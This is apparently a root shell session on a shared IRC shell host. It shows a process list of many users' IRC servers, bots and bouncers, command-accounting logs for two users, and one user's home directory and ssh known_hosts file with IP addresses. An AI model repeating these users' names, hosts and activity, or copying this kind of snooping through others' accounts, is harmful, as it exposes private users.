nodex       1219  0.0  0.1  3408   796  ??  S    27Jan08  20:22.77 ircd: irc.nodexirc.net (ircd)
crazyl      1230  0.0  0.2  3484  1896  ??  S    27Jan08  62:45.21 ./eggdrop ApocBot.conf (eggdrop-1.6.18)
crazyl      1241  0.0  0.2  3952  2400  ??  S    27Jan08  93:52.56 ./eggdrop Hibben.conf (eggdrop-1.6.18)
crazyl      1248  0.0  0.2  4128  2352  ??  S    27Jan08  96:56.14 ./eggdrop CLBot.conf (eggdrop-1.6.18)
root        2937  0.0  0.0  1408   204  ??  Is   27Jan08   2:15.57 oidentd
ioplex      4479  0.0  0.2  5228  1608  ??  Ss   10Jun09   2:15.27 ./psybnc conf
roodyk      7496  0.0  0.0  4512   496  ??  Ss   26Apr09   0:34.85 ./sbnc
roodyk      7497  0.0  0.2  7760  2416  ??  S    26Apr09   2:06.67 ./sbnc --rpc-child
bluewish    8293  0.0  0.1  1580   524  ??  Ss   31Mar09   3:18.90 ./energymech
skypilot   11073  0.0  0.0  1508     0  ??  IWs  -         0:00.00 ./bnc
ste        12145  0.0  0.2  3936  2368  ??  Ss   15Jun09   6:32.39 /usr/home/ste/bsd mob
ste        12182  0.0  0.2  4960  2556  ??  Ss   15Jun09   7:31.60 /usr/home/ste/bsd player
lordy      12679  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12680  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12682  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12683  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12684  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12685  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 <defunct>
lordy      12686  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 <defunct>
lordy      12687  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12689  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12690  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12691  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12692  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12695  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12696  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 <defunct>
lordy      12697  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 <defunct>
lordy      12701  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 <defunct>
crrj13     15843  0.0  0.3  5508  2696  ??  S    28Apr09   3:57.42 ircd: lambda.bitsjointirc.net (ircd)
daali      18199  0.0  0.0  2888     0  ??  IWs  -         0:00.00 ./bnc bnc.conf
daali      18620  0.0  0.0  2716     0  ??  IWs  -         0:00.00 ./bnc bnc.conf
scouse     19191  0.0  0.1  2956  1152  ??  S    27Nov08 825:22.21 ircd: irc.toughsociety.com (ircd)
scouse     19383  0.0  0.1  7296   676  ??  S    27Nov08   0:46.99 ./services -logchan
root       21928  0.0  0.2  5476  2020  ??  Is    9:10PM   0:00.07 sshd:  (sshd)
root       22109  0.0  0.2  5344  2024  ??  Ss    9:15PM   0:00.09 sshd:  (sshd)
blotch     22806  0.0  1.2 18352 12200  ??  Ss   10Dec08 4616:08.79 /usr/home/blotch/inspircd/bin/inspircd
shoes      25037  0.0  0.2  5092  2132  ??  S    23Sep08 156:12.96 ./eggdrop ./bot.conf (eggdrop-1.6.19)
shoes      25039  0.0  0.2  5152  2160  ??  S    23Sep08 153:40.81 ./eggdrop ./bot.conf (eggdrop-1.6.19)
crazyl     25232  0.0  0.3  4344  2676  ??  S    31Jan09  28:34.31 ./eggdrop cx4storm.conf (eggdrop-1.6.18)
narcissu   26686  0.0  0.1  4740  1452  ??  S    11Mar08  22:41.05 ircd: beta.pseud0.net (ircd)
smash      26960  0.0  0.2 12128  2032  ??  Ss    9Nov08 147:51.60 /usr/home/smash/wraith/wraith iridium
blake96    27902  0.0  0.2  3344  1924  ??  S     8Nov08  23:08.58 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
lyhne1     29482  0.0  0.1  1448   700  ??  S     2Jan09 134:02.80 ./bopm
chrirc     33440  0.0  0.1  3520   776  ??  S    12Jun08  15:34.94 ircd: irc.ChristianIRC.net (ircd)
yaquis     43784  0.0  0.1  1520   736  ??  Ss   12Jun09   0:02.72 ./bnc
devil      43953  0.0  0.1  1592   620  ??  Ss    6Jul08  75:48.71 ./energymech
smash      44333  0.0  0.2  3936  1920  ??  Ss    5May09  22:54.47 /usr/home/smash/wraith/wraith fpck
ltootle    48390  0.0  0.2  7040  2456  ??  S    26Jun08 935:23.47 ircd: RedWolf.Wolfpac.Org (ircd)
root       51233  0.0  0.2  2268  1784  ??  Ss   11:50PM   0:07.93 screen
lordy      51655  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51656  0.0  0.0     0     0  ??  Z     8Jun09   0:00.01 <defunct>
lordy      51657  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51658  0.0  0.0     0     0  ??  Z     8Jun09   0:00.01 <defunct>
lordy      51659  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51660  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51661  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51662  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51663  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51664  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51665  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51668  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
lordy      51669  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 <defunct>
y2j        53333  0.0  0.2  3296  1680  ??  S    22May09   4:05.27 ./psybnc
y2j        53335  0.0  0.3  4796  2992  ??  S    22May09   6:11.27 ./eggdrop IcEMaN.conf (eggdrop-1.6.17)
y2j        53336  0.0  0.4  6032  3608  ??  S    22May09   7:22.14 ./eggdrop SioN.conf (eggdrop-1.6.17)
ltootle    54810  0.0  0.1  8336   992  ??  S    26Jun08  24:35.00 ./services
bruhaha    59704  0.0  0.0  1528     0  ??  IWs  -         0:00.00 ./bnc
root       60582  0.0  0.2  5400  2036  ??  Is    3:32AM   0:00.60 sshd: romeo [priv] (sshd)
romeo      60584  0.0  0.2  5384  2088  ??  S     3:32AM   0:09.86 sshd:  (sshd)
root       63283  0.0  0.2  2332  1828  ??  Is   Wed10PM   0:01.12 screen
root       64492  0.0  0.1  2772   604  ??  Is   17Jun09   4:12.85 /usr/sbin/sshd
bruhaha    67858  0.0  0.1  1544   616  ??  Ss   23Aug08  17:43.63 ./bnc
bruhaha    70843  0.0  0.0  1516     0  ??  IWs  -         0:00.00 ./bnc
dealer     78536  0.0  0.1  8176  1316  ??  S    14Mar09 220:01.22 php dealbot.php
own3d      82309  0.0  0.1  2820   728  ??  Is   15Oct08   3:35.17 ./sbnc
lymelyte   88242  0.0  0.2  7720  2084  ??  Ss   29Mar09   4:33.70 ./epona
poolboy    89012  0.0  0.4  5752  3984  ??  S     8Feb09 320:59.08 ./eggdrop CAP0.conf (eggdrop-1.6.17)
redrum     91676  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
redrum     91678  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
redrum     91682  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
root       92538  0.0  0.0     0     8  ??  DL   Thu08AM   0:00.08 [accounting]
root       93821  0.0  0.1  1436   844  ??  Is   Thu08AM   0:00.00 inetd
root       98040  0.0  0.2  5368  2016  ??  Is    4:35PM   0:00.04 sshd: ioplex [priv] (sshd)
ioplex     98044  0.0  0.4  7364  4052  ??  I     4:35PM   0:02.03 sshd: ioplex (sshd)
crazie     98542  0.0  0.4  9732  3884  ??  S    19May09  36:58.07 ./l
crazie     98871  0.0  0.3  9236  3152  ??  S    19May09  13:26.08 ./mb2
crazie     99303  0.0  0.2  7512  2324  ??  S    19May09   7:43.22 ./mb6
root        1033  0.0  0.0  1344     0  v0  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv0
root        1034  0.0  0.0  1344     0  v1  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv1
root        1035  0.0  0.0  1344     0  v2  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv2
root        1036  0.0  0.0  1344     0  v3  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv3
root        1037  0.0  0.0  1344     0  v4  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv4
root        1038  0.0  0.0  1344     0  v5  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv5
root        1039  0.0  0.0  1344     0  v6  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv6
root        1040  0.0  0.0  1344     0  v7  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv7
darien9     2420  0.0  0.1 114060  1208  p0- S    16Mar08 799:19.15 ./psybnc
manboo      9260  0.0  0.1  3676   924  p0- S    22Apr08  20:51.79 ircd: irc.thederka.com (ircd)
manboo     11135  0.0  0.1  4288   620  p0- S    22Apr08   4:36.07 ./services
ac1115     21918  0.0  0.1 21512  1200  p0- S     2Jul08  15:39.60 ./psybnc
devil      22201  0.0  0.2 21412  1712  p0- S     2Nov08  46:45.70 ./psybnc
bpunux     27500  0.0  0.1  9476  1136  p0- S    31Oct08   9:22.64 ./psybnc
bpunux     28911  0.0  0.1  3068   976  p0- S    31Oct08   6:58.93 ./psybnc
tarawa     33111  0.0  0.3 29660  2640  p0- S    14Mar08 106:21.81 ./psybnc
reznik     33517  0.0  0.1 40788  1268  p0- S    27Apr08  44:00.81 ./psybnc
genosyde   34316  0.0  0.1  3192  1464  p0- S     5Jun08  39:10.11 ./eggdrop -m (eggdrop-1.6.18)
chrirc     40199  0.0  0.1  4248   628  p0- S    12Jun08   3:50.57 ./services
vamp       44090  0.0  0.2  3936  2464  p0- S    27Jan08 103:08.26 ./eggdrop guanoapes.conf (eggdrop-1.6.15)
vamp       44142  0.0  0.2  8352  2400  p0- S    27Jan08 102:58.38 ./eggdrop phante.conf (eggdrop-1.6.15)
vamp       44170  0.0  0.2  3720  2120  p0- S    27Jan08  93:42.97 ./eggdrop bengal.conf (eggdrop-1.6.15)
darien9    46897  0.0  0.1 84316  1384  p0- S     1Apr08 1518:35.73 ./psybnc
romeo      51236  0.0  0.2  3268  1836  p0  Is   11:50PM   0:00.03 /usr/local/bin/bash
romeo      51241  0.0  0.7  9932  6740  p0  S+   11:50PM   0:34.89 irssi -h absolute.ownage.net
burnt      59824  0.0  0.3  5952  3156  p0- S    27Jan08  54:17.27 ircd: wasted.ufc-pride.org (ircd)
burnt      59989  0.0  0.1  9012  1108  p0- S    27Jan08   5:52.73 ./services
sharpie    63388  0.0  0.2  3908  2172  p0- S    27Jan08  61:39.10 ./eggdrop egg (eggdrop-1.6.15)
daali      79885  0.0  0.3  5032  2656  p0- S    28Jan08  55:47.60 ./eggdrop (eggdrop-1.6.18)
darkevil   84286  0.0  0.1  3868   704  p0- S    25Mar08  17:04.32 ircd: irc.darkquest.org (ircd)
sharpie    95504  0.0  0.2  3812  2140  p0- S    25Apr08  53:07.90 ./eggdrop sun (eggdrop-1.6.15)
sharpie    95593  0.0  0.2  3708  2148  p0- S    25Apr08  51:59.24 ./eggdrop spank (eggdrop-1.6.15)
root       22120  0.0  0.2  3220  1888  p1  Ss    9:16PM   0:00.03 -bash (bash)
root       22827  0.0  0.1  1648   980  p1  R+    9:32PM   0:00.00 ps -auxwww
dark        3869  0.0  0.2 31228  2488  p2- S    22Apr09  11:35.44 ./psybnc
romeo       4433  0.0  0.1  2040  1448  p2  S+    7:09PM   0:00.04 screen -r
mooo       10652  0.0  0.2 41984  2284  p2- S    21May09  11:44.09 ./psybnc
tlm        11616  0.0  0.2 27520  1788  p2- S    26Apr09   4:20.44 ./psybnc
vamp       18167  0.0  0.1 29116  1320  p2- S     5Apr08  23:34.92 ./psybnc
wchan21    29220  0.0  0.2 10628  2024  p2- S    30Apr09   7:46.46 ./psybnc psybnc.conf
mimik0r    29613  0.0  0.2  5176  2248  p2- S    30May09   3:56.60 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
psycoz     29853  0.0  0.1  3248  1404  p2- S     7Jun09   1:13.18 ./psybnc
zeepysea   33510  0.0  0.1  1424   620  p2- S    20Mar08 291:26.11 ./bopm
lordy      33773  0.0  0.1  6120  1468  p2- S    30May09 440:58.20 ./bot
lordy      33777  0.0  0.1  3848   944  p2- S    30May09 360:11.97 ./bot
lordy      33783  0.0  0.2  7468  1684  p2- S    30May09 444:16.39 ./bot
lordy      33807  0.0  0.1  4696  1024  p2- S    30May09 439:42.64 ./bot
lordy      33811  0.0  0.1  5784  1088  p2- S    30May09 443:07.55 ./bot
narcissu   34556  0.0  0.1 136368   564  p2- S    20Feb08  38:20.52 ./psybnc
cmm        37284  0.0  0.2 22500  1724  p2- S    13Apr09   6:35.61 ./psybncD
devil      43929  0.0  0.2 15176  2316  p2- S    22May09   8:40.13 sshd
yaquis     47275  0.0  0.2  2976  1680  p2- S     6Jun09   1:51.67 ./eggdrop -m simple.conf (eggdrop-1.6.15)
chaos1     48442  0.0  0.3  3400  2812  p2- S    10:44PM   0:07.40 ircd: irc.sonicanime.net (ircd)
chaos1     48822  0.0  0.7  8296  7116  p2- S    10:52PM   0:01.09 /home/chaos1/core/anope/host/services
chaos1     49843  0.0  0.6  7060  6444  p2- S    11:19PM   1:36.17 /home/chaos1/core/eggdrop/eggdrop ./run.eggdrop (eggdrop-1.6.19)
tarawa     51960  0.0  3.6 82452 36732  p2- S    17May09  10:36.81 ./eggdrop Asurada.conf (eggdrop-1.6.19)
yaquis     52945  0.0  0.1  1432   960  p2- S    12:31AM   0:48.93 ./bopm
mlh        54757  0.0  0.2  3620  2108  p2- S     8Apr09   8:18.74 ./eggdrop a.conf (eggdrop-1.6.19)
safety     59083  0.0  0.2  3316  1752  p2- S    22May09   1:49.86 ./psybnc
brosco     59827  0.0  0.2  3912  2532  p2- S     1Jun09   3:41.68 ./eggdrop iphoney.conf (eggdrop-1.6.19)
romeo      60586  0.0  0.2  3244  1900  p2  Is    3:32AM   0:00.05 -bash (bash)
cpu        60695  0.0  0.2 12308  1880  p2- S    22May09   2:16.63 ./gramicci
bollox     61265  0.0  0.2  3556  2068  p2- S     1May09   5:46.65 ./eggdrop Prolapse.conf (eggdrop-1.6.18)
dealer     74736  0.0  0.2  3180  1636  p2- S     8Apr09   6:58.53 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
ircjaymz   75110  0.0  0.1 10012  1220  p2- S    18Mar08  24:56.65 ircd: ircdt.com (ircd)
redrum     80211  0.0  0.6  9244  6144  p2- S     9Jun09   9:12.34 ./eggdrop (eggdrop-1.6.19)
redrum     80260  0.0  0.6  6868  5764  p2- S     9Jun09   2:38.87 ./eggdrop ald.conf (eggdrop-1.6.19)
bollox     80752  0.0  0.2  3812  2152  p2- S     7Apr09   8:30.62 ./eggdrop Cerebrum.conf (eggdrop-1.6.18)
cazz1961   81636  0.0  0.2  3236  1784  p2- S     8May09  11:18.66 ./eggdrop voicer.conf (eggdrop-1.6.19)
poolboy    85768  0.0  2.3 38696 23352  p2- S    13Jun09 344:08.61 ./eggdrop PlaTaNo.conf (eggdrop-1.6.17)
qfx        85944  0.0  0.2  3592  2016  p2- S    10Jun09   0:53.81 ./psybnc
tarawa     88344  0.0  3.0 31980 30444  p2- S    26May09   5:41.99 ./eggdrop Rasetsu.conf (eggdrop-1.6.19)
bollox     90551  0.0  0.3  4188  2616  p2- S    10Jun09   4:03.14 ./psybnc
darien9      363  0.0  0.1 126420  1276  p3- S     6Mar08 967:34.73 ./psybnc
sysc        3001  0.0  0.1 53544  1492  p3- S    27Jan08  28:52.73 ./psybnc
sqd        15833  0.0  0.1 19444  1436  p3- S     4Aug08  27:53.54 ./psybnc
crazyl     37528  0.0  0.1 20120  1464  p3- S    27Nov08   8:58.67 ./psybnc
en0prcv    58418  0.0  0.1 67988  1228  p3- S     4Apr08  97:19.44 ./psybnc
skypilot   65653  0.0  0.0  7460   388  p3- S    19Nov08   2:43.71 /home/skypilot/NeoStats3.0//bin/neostats
chevym4n    6472  0.0  0.1  5156   772  p4- S    27Jan08  17:56.69 ircd: pdev.SummitIRC.com (ircd)
cpu        10289  0.0  0.2 27016  2152  p4- S    14Apr09   5:33.20 ./subdue
cpu        10303  0.0  0.2 24588  1896  p4- S    14Apr09   4:56.34 ./arc
oby1       18390  0.0  0.1 103980  1392  p4- S     8Oct08  37:31.06 ./psybnc
skypilot   43173  0.0  0.1  5612   968  p4- S     3Nov08  10:41.95 ircd: Stinger.SkyzNet.Net (ircd)
cmm        60721  0.0  0.3 100744  3488  p4- S    10Apr09  50:30.96 ./psybncC
cmm        60933  0.0  0.3 31732  2888  p4- S    10Apr09  26:32.93 ./psybncB
cmm        61190  0.0  0.2 26200  2420  p4- S    10Apr09  14:16.41 ./psybncR
pimpinjg   63286  0.0  0.2  3268  1776  p4  Is   Wed10PM   0:00.03 /usr/local/bin/bash
pimpinjg   63289  0.0  0.9 12636  9372  p4  S+   Wed10PM   1:16.45 irssi -h 72.20.28.217
darien9    74450  0.0  0.2 38220  2084  p4- S    31Oct08 107:35.62 ./psybnc
digitalman 97383  0.0  0.2 12644  2436  p4- S    20May09   6:43.68 ./psybnc psybnc.conf
chevym4n   11847  0.0  0.1  5892   756  p6- S    25Oct08  13:16.82 ircd: irc.SummitIRC.com (ircd)
crrj13     60894  0.0  0.4 14816  4384  p6- S     6May09   1:41.02 /home/crrj13/NeoStats3.0//bin/neostats
lynx       71244  0.0  0.1 15292  1164  p6- S    27Aug08  13:54.41 ./psybnc
yaquis     81249  0.0  0.2  2952  1664  p6- S     5Jun09   2:01.94 ./eggdrop -m simple.conf (eggdrop-1.6.15)
yaquis     81862  0.0  5.6 58788 57552  p6- S    13Jun09 119:13.68 ircd: coke.accesox.net (ircd)
darien9    95226  0.0  0.1  7876  1096  p6- S    23Jul08  20:45.03 ./psybnc
baxxta     95367  0.0  0.1  8020  1144  p6- S    22Jul08  13:11.93 ./psybnc
yaquis     98909  0.0  0.1  3140  1312  p6- S    30May09   1:26.70 ./psybnc
nardi      18637  0.0  0.1  1480   680  p7- S    10Mar09  33:41.69 ./bopm
crash      29763  0.0  0.3 32276  3504  p7- S    30Jan09 164:54.34 ./psybnc1
mlh        52784  0.0  0.3  4584  3340  p7- S    10Jan09  22:48.64 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
nyakz      54517  0.0  0.2 30984  2448  p7- S    13Mar09  52:56.09 ./psybnc
nardi      76675  0.0  0.1  5024   912  p7- S     8Feb09   7:16.69 ircd: Java.Albworld.Net (ircd)
sqd        77187  0.0  0.2  3352  1584  p7- S    21Jan09  13:05.79 ./eggdrop simple.conf (eggdrop-1.6.19)
darkuno3   77376  0.0  0.1  3400   792  p7- S    10Mar09   4:06.45 ircd: 72.20.28.219 (ircd)
lyhne1     88130  0.0  0.4 10540  3712  p7- S    22Dec08  69:14.36 ircd: BlackLotus.Sin-Clan.org (ircd)
lymelyte   88229  0.0  0.3  3880  3016  p7- S    29Mar09   7:28.37 ircd: irc.ftaresource.com (ircd)
chozen1    89082  0.0  0.1  3192  1032  p7- S     1Mar09   5:32.87 ./psybnc
kokoryu    93127  0.0  0.3  4060  2852  p7- S     6Feb09  32:11.57 ./eggdrop (eggdrop-1.6.19)
hts        96224  0.0  0.6 39004  6252  p7- S     2Mar09  51:21.25 ircd: vital.irc.hackthissite.org (ircd)
visage     96264  0.0  0.2  3192  1692  p7- S    13Mar09   9:27.48 ./eggdrop -m (eggdrop-1.6.19)
mrts       24165  0.0  0.2  3176  1612  p8- S    28Mar09   7:48.33 ./eggdrop euro.conf (eggdrop-1.6.19)
jax66      57226  0.0  0.1  1516   652  p8- S    11May09  24:51.69 ./bopm
brosco     58343  0.0  0.2 15992  1800  p8- S    29Mar09   8:13.84 ./psybnc
dv327      76866  0.0  0.1 27624  1208  p8- S     9Aug08  15:14.39 ./psybnc
subkult    88094  0.0  0.1 72724  1280  p8- S    15Jan09  80:54.12 ./psybnc
bluewish   97486  0.0  0.2  3552  1852  p8- S    29Mar09   8:28.42 ./eggdrop (eggdrop-1.6.19)
brosco     31552  0.0  0.3  3792  2592  p9- S    16Mar09  14:24.16 ./eggdrop cancer.conf (eggdrop-1.6.19)
mrts       32626  0.0  0.2  3176  1620  p9- S    20Mar09   8:36.07 ./eggdrop sins.conf (eggdrop-1.6.19)
poolboy    44789  0.0  0.2  3448  1956  p9- S     9Feb09  15:20.31 ./eggdrop DaB0SS.conf (eggdrop-1.6.17)
poolboy    44901  0.0  0.2  3312  1896  p9- S     9Feb09  15:07.57 ./eggdrop Little-JR.conf (eggdrop-1.6.17)
bollox     60129  0.0  0.3  5308  3376  p9- S     4Jun09   2:40.74 ./eggdrop cutenurse.conf (eggdrop-1.6.18)
bollox     60150  0.0  0.3  5164  3280  p9- S     4Jun09   2:23.03 ./eggdrop slutnurse.conf (eggdrop-1.6.18)
brosco     76877  0.0  0.2  3760  2348  p9- S    19Mar09  13:04.80 ./eggdrop-1.6.19 -m plague.conf
crash      99452  0.0  0.2 37052  2128  p9- S    19Mar09  12:20.42 ./psybnc-oth
paleride     265  0.0  0.2  3648  2092  pb- S    27Jan09  19:36.88 ircd: irc.leechnet.net (ircd)
paleride     908  0.0  0.1  4276   788  pb- S    27Jan09   1:40.52 ./services -nofork
grumpy     79140  0.0  0.3  5576  2692  pb- S     4Feb09  16:37.28 ircd: irc.sidnaceous.com (ircd)
grumpy     82947  0.0  0.1  7572  1140  pb- I     4Feb09   1:28.12 ./services start
nardi      17529  0.0  0.1 25992  1028  pc- S    24Mar09  23:43.99 ircd: ChatAlb.Albania.Rr.Nu (ircd)
cazz1961   17100  0.0  0.6  8824  6268  pd- S    Sun06AM  87:41.30 ircd: Smirnoff.1andallirc.net (ircd)
omgwtf     29455  0.0  0.2  3408  1996  pd- S    Sat04AM   0:48.34 ./eggdrop uno.conf (eggdrop-1.6.19)
omgwtf     29570  0.0  0.2  3572  2228  pd- S    Sat04AM   0:48.16 ./eggdrop ambition.conf (eggdrop-1.6.19)
zeepysea   37950  0.0  0.2  3684  1952  pd- S    17Mar09  10:42.06 ircd: irc.eoegameservers.com (ircd)
zeepysea   38077  0.0  0.1  8204  1092  pd- S    17Mar09   1:07.05 ./services start
genosyde   63662  0.0  0.2 17308  2432  pd- S    27Jan09  21:57.28 ./psybnc
matt       83686  0.0  0.1  3140  1184  pd- S    Sat05PM   0:17.40 ./psybnc psybnc.conf
mrts       84263  0.0  0.2  3172  1636  pd- S    20Mar09   8:46.15 ./eggdrop hez.conf (eggdrop-1.6.19)
yaquis     94000  0.0  0.5 58432  5312  pd- S    Fri10PM   4:51.24 ircd: irc2.accesox.net (ircd)
cont       49538  0.0  0.2 19684  1784  pe- S    11Jan09  12:46.04 ./psybnc
chaos1     56819  0.0  0.8 11604  8064  pf- I    18Jun09   0:40.97 /usr/bin/perl ./idlebot.pl (perl5.8.8)
[root@velocity:/var/run]# 

[root@velocity:~]# lastcomm -u romeo
sh               -       romeo            __         0.00 us
ls               -       romeo            __         0.00 us
screen           -F      romeo            __         0.00 us
screen           -F      romeo            __         0.00 us
w                -       romeo            ttyp1      0.00 us
sh               -       romeo            ttyp1      0.00 us
sshd             -F      romeo            __         0.59 us
bash             -       romeo            ttyp1      0.00 us
ls               -       romeo            ttyp1      0.00 us
w                -       romeo            ttyp1      0.00 us
screen           -       romeo            ttyp1      0.00 us
screen           -F      romeo            __         0.00 us
screen           -F      romeo            __         0.00 us
screen           -F      romeo            __         0.00 us
w                -       romeo            ttyp1      0.00 us
sh               -       romeo            ttyp1      0.00 us

[root@velocity:~]# lastcomm -u pimpinjg
sshd             -F      pimpinjg         __         0.00 us
bash             -       pimpinjg         ttyp2      0.00 us
screen           -       pimpinjg         ttyp2      0.00 us
screen           -F      pimpinjg         __         0.00 us
screen           -F      pimpinjg         __         0.00 us
screen           -F      pimpinjg         __         0.00 us
fortune          -       pimpinjg         ttyp2      0.00 us
sshd             -F      pimpinjg         __         0.00 us
sftp-server      -       pimpinjg         __         0.02 us
sshd             -F      pimpinjg         __         0.03 us
bash             -       pimpinjg         ttyp2      0.00 us
tput             -       pimpinjg         ttyp2      0.00 us
screen           -       pimpinjg         ttyp2      0.00 us
screen           -F      pimpinjg         __         0.00 us
screen           -F      pimpinjg         __         0.00 us
screen           -F      pimpinjg         __         0.00 us
fortune          -       pimpinjg         ttyp2      0.00 us


[root@velocity:/home/romeo]# ls -la 
total 80
drwxr-xr-x    4 romeo  romeo   512 Jun 27 21:56 ./
drwx--x--x  204 root   wheel  3584 Jun 17 18:30 ../
-rw-------    1 romeo  romeo     5 Jun 17 18:35 .bash_history
-rw-r--r--    1 romeo  romeo    44 Jun 13 08:05 .bash_profile
-rw-r--r--    1 romeo  romeo  2469 Jun 13 08:00 .bashprompt
-rw-r--r--    1 romeo  romeo   258 Jun 13 08:03 .bashrc
-rw-r--r--    1 romeo  romeo   767 Jun 13 07:56 .cshrc
-rw-r--r--    1 romeo  romeo    23 Jun 17 18:39 .forward
drwx------    4 romeo  romeo   512 Jun 17 09:42 irclogs/
drwx------    3 romeo  romeo   512 Jun 17 09:42 .irssi/
-rw-------    1 romeo  romeo    35 Jun 26 17:58 .lesshst
-rw-r--r--    1 romeo  romeo   248 Jun 13 07:56 .login
-rw-r--r--    1 romeo  romeo   158 Jun 13 07:56 .login_conf
-rw-------    1 romeo  romeo   373 Jun 13 07:56 .mail_aliases
-rw-r--r--    1 romeo  romeo   331 Jun 13 07:56 .mailrc
-rw-r--r--    1 romeo  romeo   797 Jun 13 07:56 .profile
-rw-------    1 romeo  romeo   276 Jun 13 07:56 .rhosts
-rw-r--r--    1 romeo  romeo   975 Jun 13 07:56 .shrc
drwx------    2 romeo  romeo   512 Jun 20 02:58 .ssh/

[root@velocity:/home/romeo]# cat .ssh/known_hosts 
72.20.6.198 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYSZga5G62dznPwCooUV5e+kVQ8861IxS3aw3ZkDt9uzLZswbqN4iQmkP7bokLACE7Oz2nIiKkVwcjCF8qqO3lk4pdIJNxg6hTuQcZzPR9IHiK38ajERh2JlPPq1zyCwTvPJK8qTNuwZTcdrlJHrFcZpatepHSTu9hdjb+gF4e1oQNyC20nLtD0w1789tFfJKu/5J5jNEOtj7NyfqEwr3nN2iok4LbdZfK321htZwouCWcC2alEacjuYkcRZylgmxhek5dBqLO+LZTvyuppFTiz8RCmwbVSNK+NVgkj4e4WFcR9CoLh2mfW6o4EfE3d9cxFl9Jk/IHLYPQ/TRbaPVw==
189.14.205.42 ssh-dss
opteron1.ircvps.com,98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
quad1.ircvps.com,89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
[root@velocity:/home/romeo]#

[root@velocity:/home/romeo/.irssi]# ls -la 
total 108
drwx------  3 romeo  romeo   512 Jun 17 09:42 ./
drwxr-xr-x  4 romeo  romeo   512 Jun 27 21:56 ../
-rw-------  1 romeo  romeo  4500 Jun 28 02:13 away.log
-rw-r--r--  1 romeo  romeo  9591 Jun 27 22:51 config
-rw-r-----  1 romeo  romeo   584 Jun 17 07:16 config.old
-rw-r-----  1 romeo  romeo  8472 Jun 27 21:56 default.theme
